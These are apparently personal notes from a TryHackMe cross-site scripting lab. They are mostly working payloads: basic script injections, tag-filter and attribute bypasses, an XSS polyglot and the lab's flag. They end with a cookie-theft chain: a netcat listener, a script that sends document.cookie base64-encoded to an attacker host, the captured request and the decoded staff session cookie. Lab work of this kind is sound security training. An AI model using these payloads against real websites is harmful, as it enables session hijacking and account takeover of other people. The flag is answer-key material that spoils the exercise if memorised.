XSS

https://github.com/mandatoryprogrammer/xsshunter-express

Basic payload

<script>alert('THM');</script>

"><script>alert('THM');</script>

</textarea><script>alert('THM');</script>

';alert('THM');//

When filter remove script tag.

<sscriptcript>alert('THM');</sscriptcript>

When <> are filtered.

/images/cat.jpg" onload="alert('THM');"

Flag.

THM{XSS_MASTER}

XSS polyglot.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e

Run http server on attacker machine

nc -nlvp 9001

2. Generate a payload

</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>

3. Catch cookie

root@ip-10-10-117-154:~# nc -nlvp 9001
Listening on [0.0.0.0] (family 0, port 9001)
Connection from 10.10.222.139 34142 received!
GET /?cookie=c3RhZmYtc2Vzc2lvbj00QUIzMDVFNTU5NTUxOTc2OTNGMDFENkY4RkQyRDMyMQ== HTTP/1.1
Host: 10.10.117.154:9001
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/89.0.4389.72 Safari/537.36
Accept: */*
Origin: http://172.17.0.1
Referer: http://172.17.0.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-US

Decode b64 cookie

staff-session=4AB305E55955197693F01D6F8FD2D321

XSS

Basic payload

XSS polyglot.

Cookie hijacking